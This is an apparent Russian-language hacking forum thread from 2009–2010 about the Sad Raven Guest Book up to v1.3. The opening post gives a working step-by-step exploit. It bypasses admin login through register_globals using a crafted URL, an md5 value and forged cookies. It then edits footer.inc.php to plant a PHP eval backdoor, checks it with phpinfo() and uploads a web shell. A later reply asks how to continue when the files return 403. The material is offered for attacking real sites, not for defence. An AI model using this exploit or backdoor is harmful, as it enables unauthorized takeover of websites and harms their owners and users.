Sad Raven Guest Book <=v1.3
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Sad Raven Guest Book <=v1.3 - 2009-10-14 15:01:58.173333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Она же sr guest. Вход в админ панель:
<?php
if (!isset($alogin) || md5($pass) != $Password[$alogin] || !isset($Password[$alogin]))
?>
1. Админка находится по адресу: http://site.com/guest/admin.php 2. Зайти можно с таким запросом (условие - register globals=on): http://site.com/guest/admin.php?pass=3105&alogin=3105&Password[3105]=37e7897f62e8d91b1ce60515829ca282 3105 - цифра от балды, а 37e7897f62e8d91b1ce60515829ca282 - это md5(3105) но мы пока не админы, т.к. в админку пустило, но при попытке выполнить какие-либо действия в админке нас опять выкидывает на залогивание, смотрим: 1. После перехода по ссылке выше у нас появятся две куки:
Имя:
alogin
Содержимое:
3105
Узел:
site.com
Путь:
/guest/
Имя:
pass
Содержимое:
3105
Узел:
site.com
Путь:
/guest/
к которым надо будет добавить третью (через тот же плагин для FF cookie editor):
Имя:
Password[3105]
Содержимое:
37e7897f62e8d91b1ce60515829ca282
Узел:
site.com
Путь:
/guest/
и вот тогда мы уже полноценные админы 2. Заливка шелла: - Идем в http://site.com/guest/admin.php?design - Правим footer.inc.php - вставляем
<?php eval(stripslashes($_GET[e]));?>
для 100% уверенности, обходим magic_quotes=ON 3. проверяем: http://site.com/guest/index.php?e=phpinfo(); 4. Льем шелл.
|
|
|
RE: Sad Raven Guest Book <=v1.3 - 2009-10-15 16:54:32.926666
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Уже лет 5 этой гостевой хрени, неужели ещё кто-то пользуется?
|
|
|
RE: Sad Raven Guest Book <=v1.3 - 2009-10-15 18:06:36.180000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
да, и по сей день, уязвимость так сказать из практики
|
|
|
RE: Sad Raven Guest Book <=v1.3 - 2010-03-11 12:50:46.783333
|
|
|
Дочь Билла Гейтса
Сообщений: 46
Оценки: 0
Присоединился: 2008-05-24 00:37:53.486666
|
возможно ли что-то сделать, если файлы из папки design доступны на запись, но выдают 403 ошибку при попытке доступа?
|
|
|
|
|